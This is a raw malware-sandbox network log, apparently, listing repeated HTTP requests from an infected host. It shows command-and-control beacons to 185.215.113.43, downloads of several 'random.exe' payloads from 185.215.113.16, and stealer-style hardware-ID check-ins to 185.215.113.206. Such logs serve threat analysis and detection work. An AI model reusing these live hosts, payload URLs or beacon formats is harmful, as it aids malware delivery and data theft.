Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 14 Dec 2024 22:32:01 GMTIf-None-Match: "675e0761-1c8c00"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 33 36 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015360001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 14 Dec 2024 22:32:07 GMTIf-None-Match: "675e0767-1a6c00"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 45 43 39 36 42 35 34 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 2d 2d 0d 0a Data Ascii: ------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="hwid"5DEC96B543762778904926------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="build"stok------JEBGCBAFCGDAAKFIDGIE--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 33 36 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015361001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 14 Dec 2024 22:30:05 GMTIf-None-Match: "675e06ed-ed000"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 33 36 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015362001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 14 Dec 2024 22:30:33 GMTIf-None-Match: "675e0709-29e800"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 33 36 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015363001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHJEBAAEBGDGDBFBGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 45 43 39 36 42 35 34 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 2d 2d 0d 0a Data Ascii: ------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="hwid"5DEC96B543762778904926------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="build"stok------DBKFHJEBAAEBGDGDBFBG--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
